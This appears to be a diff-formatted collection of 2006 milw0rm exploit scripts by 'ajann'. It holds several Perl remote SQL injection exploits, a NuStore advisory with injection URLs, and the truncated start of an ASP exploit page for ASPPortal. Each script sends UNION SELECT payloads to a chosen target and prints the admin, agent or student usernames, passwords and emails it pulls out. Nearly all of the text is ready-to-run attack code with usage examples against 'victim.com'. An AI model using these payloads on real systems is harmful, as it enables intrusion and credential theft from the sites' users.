#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /ltext\">(.*?)<\/td>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect for Password: $server\n";
|
||||
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket1 "GET $targettwo\n";
|
||||
print $socket1 "Host: $server\n";
|
||||
print $socket1 "Accept: */*\n";
|
||||
print $socket1 "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket1>) {
|
||||
if ($answer =~ /ltext\">(.*?)<\/td>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Password: $1\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-09]
|
||||
|
|
|
@ -1,85 +1,85 @@
|
|||
#!/usr/bin/perl
|
||||
#[Script Name: NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "cl_CatListing.asp?cl_cat_ID=";
|
||||
$target = "-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
$targettwo = "-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20".$ARGV[2];
|
||||
$targettwo = $host.$dir.$file.$targettwo;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect for Password: $server\n";
|
||||
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket1 "GET $targettwo\n";
|
||||
print $socket1 "Host: $server\n";
|
||||
print $socket1 "Accept: */*\n";
|
||||
print $socket1 "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket1>) {
|
||||
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Password: $1\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
#!/usr/bin/perl
|
||||
#[Script Name: NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "cl_CatListing.asp?cl_cat_ID=";
|
||||
$target = "-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
$targettwo = "-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20".$ARGV[2];
|
||||
$targettwo = $host.$dir.$file.$targettwo;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect for Password: $server\n";
|
||||
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket1 "GET $targettwo\n";
|
||||
print $socket1 "Host: $server\n";
|
||||
print $socket1 "Accept: */*\n";
|
||||
print $socket1 "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket1>) {
|
||||
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Password: $1\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
|
|
|
@ -1,73 +1,73 @@
|
|||
#!/usr/bin/perl
|
||||
#[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
|
||||
[// Usage: class.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "propertysdetails.asp?PropID=";
|
||||
$target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /Location:(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /Address:(.*?)<\/font>/){
|
||||
print "+ Password: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /# Rooms:(.*?)<\/font>/){
|
||||
print "+ Email: $1\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
#!/usr/bin/perl
|
||||
#[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
|
||||
[// Usage: class.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "propertysdetails.asp?PropID=";
|
||||
$target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /Location:(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /Address:(.*?)<\/font>/){
|
||||
print "+ Password: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /# Rooms:(.*?)<\/font>/){
|
||||
print "+ Email: $1\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
|
|
|
@ -1,20 +1,20 @@
|
|||
*******************************************************************************
|
||||
# Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ]
|
||||
|
||||
Example:
|
||||
|
||||
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
|
||||
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
*******************************************************************************
|
||||
# Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
|
||||
*******************************************************************************
|
||||
|
||||
###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ]
|
||||
|
||||
Example:
|
||||
|
||||
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
|
||||
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
|
||||
|
||||
"""""""""""""""""""""
|
||||
# ajann,Turkey
|
||||
# ...
|
||||
|
||||
# Im not Hacker!
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
|
|
|
@ -1,69 +1,69 @@
|
|||
#!/usr/bin/perl
|
||||
#[Script Name: NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "CampusNewsDetails.asp?NewsID=";
|
||||
$target = "-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /<td width=\"21%\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /<td colspan=\"2\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
|
||||
print "+ Password: $1\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
#!/usr/bin/perl
|
||||
#[Script Name: NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "CampusNewsDetails.asp?NewsID=";
|
||||
$target = "-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /<td width=\"21%\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /<td colspan=\"2\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
|
||||
print "+ Password: $1\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Ad removed or not yet approved/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-11]
|
||||
|
|
|
@ -1,69 +1,69 @@
|
|||
#!/usr/bin/perl
|
||||
#[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "switch.asp?pg=subMenu&catid=";
|
||||
$target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){
|
||||
print "+ Password: $1\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Under Construction, Please check back soon.../) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-12]
|
||||
#!/usr/bin/perl
|
||||
#[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
|
||||
#[Coded by : ajann
|
||||
#[Author : ajann
|
||||
#[Contact : :(
|
||||
|
||||
use IO::Socket;
|
||||
if(@ARGV < 3){
|
||||
print "
|
||||
[========================================================================
|
||||
[// Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
|
||||
[// Usage: exploit.pl [target] [path] [userid]
|
||||
[// Example: exploit.pl victim.com / 1
|
||||
[// Example: exploit.pl victim.com /path/ 1
|
||||
[// Vuln&Exp : ajann
|
||||
[========================================================================
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$server = $ARGV[0];
|
||||
$server =~ s/(http:\/\/)//eg;
|
||||
$host = "http://".$server;
|
||||
$port = "80";
|
||||
$dir = $ARGV[1];
|
||||
$file = "switch.asp?pg=subMenu&catid=";
|
||||
$target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2];
|
||||
$target = $host.$dir.$file.$target;
|
||||
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $server\n";
|
||||
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $socket "GET $target\n";
|
||||
print $socket "Host: $server\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
#Getting
|
||||
while($answer = <$socket>) {
|
||||
if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){
|
||||
print "+ Exploit succeed! Getting admin information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Username: $1\n";
|
||||
}
|
||||
|
||||
if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){
|
||||
print "+ Password: $1\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Under Construction, Please check back soon.../) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ Exploit Failed : ( \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-11-12]
|
||||
|
|
|
@ -1,192 +1,192 @@
|
|||
<% Response.Buffer = True %>
|
||||
<% On Error Resume Next %>
|
||||
<% Server.ScriptTimeout = 100 %>
|
||||
|
||||
<%
|
||||
|
||||
'===============================================================================================
|
||||
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
|
||||
'[Coded by : ajann
|
||||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit1.asp
|
||||
|
||||
'[Note : exploit file name =>exploit1.asp
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
|
||||
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
|
||||
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
|
||||
'===============================================================================================
|
||||
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
|
||||
|
||||
%>
|
||||
|
||||
<html>
|
||||
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
|
||||
<head>
|
||||
|
||||
<script language="JavaScript">
|
||||
function functionControl1(){
|
||||
setTimeout("functionControl2()",2000);
|
||||
}
|
||||
|
||||
function functionControl2(){
|
||||
if(document.form1.field1.value==""){
|
||||
|
||||
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
function writetext() {
|
||||
|
||||
if(document.form1.field1.value==""){
|
||||
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
|
||||
|
||||
}
|
||||
}
|
||||
function write(){
|
||||
setTimeout("writetext()",1000);
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
|
||||
</head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
|
||||
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
|
||||
|
||||
<center>
|
||||
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal <=</b>v4.0.0(default1.asp) <u><b>
|
||||
Remote SQL Injection Exploit</b></u></a></font><br><br>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
|
||||
<tr>
|
||||
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
|
||||
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
|
||||
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
|
||||
ID=1]</b></font></td>
|
||||
<td width="50%"><center>
|
||||
<form method="post" name="form1" action="exploit1.asp?islem=get">
|
||||
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
|
||||
<input type="submit" value="Get"></center></td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
|
||||
<div id=htmlAlani></div>
|
||||
|
||||
<%
|
||||
islem = Request.QueryString("islem")
|
||||
If islem = "hata1" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
|
||||
End If
|
||||
If islem = "hata2" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
|
||||
End If
|
||||
If islem = "hata3" Then
|
||||
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
|
||||
End If
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
If islem = "get" Then
|
||||
|
||||
string1="default1.asp"
|
||||
string2="default1.asp"
|
||||
cek= Request.Form("id")
|
||||
|
||||
|
||||
targettext = Request.Form("text1")
|
||||
arama=InStr(1, targettext, "union" ,1)
|
||||
arama2=InStr(1, targettext, "http://" ,1)
|
||||
|
||||
If targettext="" Then
|
